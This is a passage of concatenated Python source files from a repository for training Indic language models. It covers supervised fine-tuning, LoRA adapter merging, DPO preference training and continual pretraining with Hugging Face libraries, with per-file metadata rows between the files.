text = f"Question: {example['question']}\n\nAnswer: {example['response_j']}"
return text
def create_datasets(tokenizer, args):
dataset = load_dataset(
args.dataset_name,
data_dir=args.subset,
split=args.split,
use_auth_token=True,
num_proc=args.num_workers if not args.streaming else None,
streaming=args.streaming,
)
if args.streaming:
print("Loading the dataset in streaming mode")
valid_data = dataset.take(args.size_valid_set)
train_data = dataset.skip(args.size_valid_set)
train_data = train_data.shuffle(buffer_size=args.shuffle_buffer, seed=None)
else:
dataset = dataset.train_test_split(test_size=0.005, seed=None)
train_data = dataset["train"]
valid_data = dataset["test"]
print(f"Size of the train set: {len(train_data)}. Size of the validation set: {len(valid_data)}")
chars_per_token = chars_token_ratio(train_data, tokenizer)
print(f"The character to token ratio of the dataset is: {chars_per_token:.2f}")
train_dataset = ConstantLengthDataset(
tokenizer,
train_data,
formatting_func=prepare_sample_text,
infinite=True,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
valid_dataset = ConstantLengthDataset(
tokenizer,
valid_data,
formatting_func=prepare_sample_text,
infinite=False,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
return train_dataset, valid_dataset
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
base_model = AutoModelForCausalLM.from_pretrained(
script_args.model_name,
quantization_config=bnb_config,
device_map={"": Accelerator().local_process_index},
trust_remote_code=True,
use_auth_token=True,
)
base_model.config.use_cache = False
tokenizer = AutoTokenizer.from_pretrained(script_args.model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right" # Fix weird overflow issue with fp16 training
train_dataset, eval_dataset = create_datasets(tokenizer, script_args)
trainer = SFTTrainer(
model=base_model,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
peft_config=peft_config,
packing=script_args.packing,
max_seq_length=None,
tokenizer=tokenizer,
args=training_args,
)
trainer.train()
trainer.save_model(training_args.output_dir)
output_dir = os.path.join(training_args.output_dir, "final_checkpoint")
trainer.model.save_pretrained(output_dir)
# Free memory for merging weights
del base_model
if is_xpu_available():
torch.xpu.empty_cache()
elif is_npu_available():
torch.npu.empty_cache()
else:
torch.cuda.empty_cache()
model = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map="auto", torch_dtype=torch.bfloat16)
model = model.merge_and_unload()
output_merged_dir = os.path.join(training_args.output_dir, "final_merged_checkpoint")
model.save_pretrained(output_merged_dir, safe_serialization=True) | 6,958 | Python | .py | 156 | 39.717949 | 126 | 0.720762 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,526 | merge_adapter.py | adithya-s-k_Indic-llm/indic_llm/dpo_finetuning/merge_adapter.py | from dataclasses import dataclass, field
from typing import Optional
import torch
from peft import PeftConfig, PeftModel
from transformers import AutoModelForCausalLM, AutoModelForSequenceClassification, AutoTokenizer, HfArgumentParser, LlamaForCausalLM, LlamaTokenizer
@dataclass
class ScriptArguments:
"""
The input names representing the Adapter and Base model fine-tuned with PEFT, and the output name representing the
merged model.
"""
adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the adapter name"})
base_model_name: Optional[str] = field(default=None, metadata={"help": "the base model name"})
base_tokenizer_name: Optional[str] = field(default=None, metadata={"help": "the tokeniser model name"})
output_name: Optional[str] = field(default=None, metadata={"help": "the merged model name"})
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
assert script_args.adapter_model_name is not None, "please provide the name of the Adapter you would like to merge"
assert script_args.base_model_name is not None, "please provide the name of the Base model"
assert script_args.base_tokenizer_name is not None, "please provide the name of the tokenizer model"
assert script_args.output_name is not None, "please provide the output name of the merged model"
peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name)
# if peft_config.task_type == "SEQ_CLS":
# # The sequence classification task is used for the reward model in PPO
# model = AutoModelForSequenceClassification.from_pretrained(
# script_args.base_model_name, num_labels=1, torch_dtype=torch.bfloat16
# )
# else:
model = LlamaForCausalLM.from_pretrained(
script_args.base_model_name, return_dict=True, torch_dtype=torch.bfloat16
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.base_model_name)
print("Loading PEFT")
# Load the PEFT model
model = PeftModel.from_pretrained(model, script_args.adapter_model_name)
model.eval()
print("Started Merging")
model = model.merge_and_unload()
print("Saving the Model")
model.save_pretrained(f"{script_args.output_name}")
tokenizer.save_pretrained(f"{script_args.output_name}")
print("Saving complete complete")
# model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False) | 2,346 | Python | .py | 43 | 52.488372 | 148 | 0.779765 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,527 | dpo.py | adithya-s-k_Indic-llm/indic_llm/dpo_finetuning/dpo.py | # 0. imports
import os
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from peft import LoraConfig
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments, LlamaTokenizer ,LlamaForCausalLM
from trl import DPOTrainer
# Define and parse arguments.
@dataclass
class ScriptArguments:
"""
The arguments for the DPO training script.
"""
# data parameters
beta: Optional[float] = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
# training parameters
model_name_or_path: Optional[str] = field(
default="../sft/results/final_checkpoint",
metadata={"help": "the location of the SFT model name or path"},
)
tokenizer_name_or_path : Optional[str] = field(
default="Cognitive-Lab/Ambari-7B-Instruct-v0.1",
metadata={"help": "the name of the tokenizer"},
)
learning_rate: Optional[float] = field(default=5e-4, metadata={"help": "optimizer learning rate"})
lr_scheduler_type: Optional[str] = field(default="cosine", metadata={"help": "the lr scheduler type"})
warmup_steps: Optional[int] = field(default=100, metadata={"help": "the number of warmup steps"})
weight_decay: Optional[float] = field(default=0.05, metadata={"help": "the weight decay"})
optimizer_type: Optional[str] = field(default="paged_adamw_32bit", metadata={"help": "the optimizer type"})
per_device_train_batch_size: Optional[int] = field(default=4, metadata={"help": "train batch size per device"})
per_device_eval_batch_size: Optional[int] = field(default=1, metadata={"help": "eval batch size per device"})
gradient_accumulation_steps: Optional[int] = field(
default=4, metadata={"help": "the number of gradient accumulation steps"}
)
gradient_checkpointing: Optional[bool] = field(
default=True, metadata={"help": "whether to use gradient checkpointing"}
)
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
max_prompt_length: Optional[int] = field(default=512, metadata={"help": "the maximum prompt length"})
max_length: Optional[int] = field(default=1024, metadata={"help": "the maximum sequence length"})
num_train_epochs : Optional[int] = field(default=1, metadata={"help": "max number of epochs to train"})
max_steps: Optional[int] = field(default=1000, metadata={"help": "max number of training steps"})
logging_steps: Optional[int] = field(default=1000, metadata={"help": "the logging frequency"})
save_steps: Optional[int] = field(default=1000, metadata={"help": "the saving frequency"})
eval_steps: Optional[int] = field(default=1000, metadata={"help": "the evaluation frequency"})
output_dir: Optional[str] = field(default="./results", metadata={"help": "the output directory"})
log_freq: Optional[int] = field(default=1, metadata={"help": "the logging frequency"})
# instrumentation
sanity_check: Optional[bool] = field(default=False, metadata={"help": "only train on 1000 samples"})
report_to: Optional[str] = field(
default="wandb",
metadata={
"help": 'The list of integrations to report the results and logs to. Supported platforms are `"azure_ml"`,'
'`"comet_ml"`, `"mlflow"`, `"neptune"`, `"tensorboard"`,`"clearml"` and `"wandb"`. '
'Use `"all"` to report to all integrations installed, `"none"` for no integrations.'
},
)
# debug argument for distributed training
ignore_bias_buffers: Optional[bool] = field(
default=False,
metadata={
"help": "fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
# def get_stack_exchange_paired(
# data_dir: str = "data/rl",
# sanity_check: bool = False,
# cache_dir: str = None,
# num_proc=24,
# ) -> Dataset:
# """Load the stack-exchange-paired dataset from Hugging Face and convert it to the necessary format.
# The dataset is converted to a dictionary with the following structure:
# {
# 'prompt': List[str],
# 'chosen': List[str],
# 'rejected': List[str],
# }
# Prompts are structured as follows:
# "Question: " + <prompt> + "\n\nAnswer: "
# """
# dataset = load_dataset(
# "lvwerra/stack-exchange-paired",
# split="train",
# cache_dir=cache_dir,
# data_dir=data_dir,
# )
# original_columns = dataset.column_names
# if sanity_check:
# dataset = dataset.select(range(min(len(dataset), 1000)))
# def return_prompt_and_responses(samples) -> Dict[str, str]:
# return {
# "prompt": ["Question: " + question + "\n\nAnswer: " for question in samples["question"]],
# "chosen": samples["response_j"],
# "rejected": samples["response_k"],
# }
# return dataset.map(
# return_prompt_and_responses,
# batched=True,
# num_proc=num_proc,
# remove_columns=original_columns,
# )
if __name__ == "__main__":
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
# 1. load a pretrained model
model = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
model.config.use_cache = False
if script_args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
model_ref = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.tokenizer_name_or_path)
tokenizer.pad_token = tokenizer.eos_token
dataset = load_dataset("CognitiveLab/hh-rlhf-formatted-60000",split="train").train_test_split(test_size=0.2)
train_dataset = dataset["train"]
eval_dataset = dataset["test"]
# 2. Load the Stack-exchange paired dataset
# train_dataset = get_stack_exchange_paired(data_dir="data/rl", sanity_check=script_args.sanity_check)
# train_dataset = train_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 3. Load evaluation dataset
# eval_dataset = get_stack_exchange_paired(data_dir="data/evaluation", sanity_check=True)
# eval_dataset = eval_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 4. initialize training arguments:
training_args = TrainingArguments(
per_device_train_batch_size=script_args.per_device_train_batch_size,
per_device_eval_batch_size=script_args.per_device_eval_batch_size,
# max_steps=script_args.max_steps,
num_train_epochs=script_args.num_train_epochs,
logging_steps=script_args.logging_steps,
save_steps=script_args.save_steps,
gradient_accumulation_steps=script_args.gradient_accumulation_steps,
gradient_checkpointing=script_args.gradient_checkpointing,
learning_rate=script_args.learning_rate,
evaluation_strategy="steps",
eval_steps=script_args.eval_steps,
output_dir=script_args.output_dir,
report_to=script_args.report_to,
lr_scheduler_type=script_args.lr_scheduler_type,
warmup_steps=script_args.warmup_steps,
optim=script_args.optimizer_type,
bf16=True,
remove_unused_columns=False,
run_name="dpo_llama2",
)
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=[
"q_proj",
"v_proj",
"k_proj",
"out_proj",
"fc_in",
"fc_out",
"wte",
],
bias="none",
task_type="CAUSAL_LM",
)
# 5. initialize the DPO trainer
dpo_trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=script_args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
peft_config=peft_config,
max_prompt_length=script_args.max_prompt_length,
max_length=script_args.max_length,
)
# 6. train
dpo_trainer.train()
dpo_trainer.save_model(script_args.output_dir)
# 7. save
output_dir = os.path.join(script_args.output_dir, "final_checkpoint")
dpo_trainer.model.save_pretrained(output_dir) | 9,332 | Python | .py | 202 | 40.282178 | 131 | 0.656618 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,528 | pretrain-gemma.py | adithya-s-k_Indic-llm/indic_llm/continual_pretrain/pretrain-gemma.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = AutoModelForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
# model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
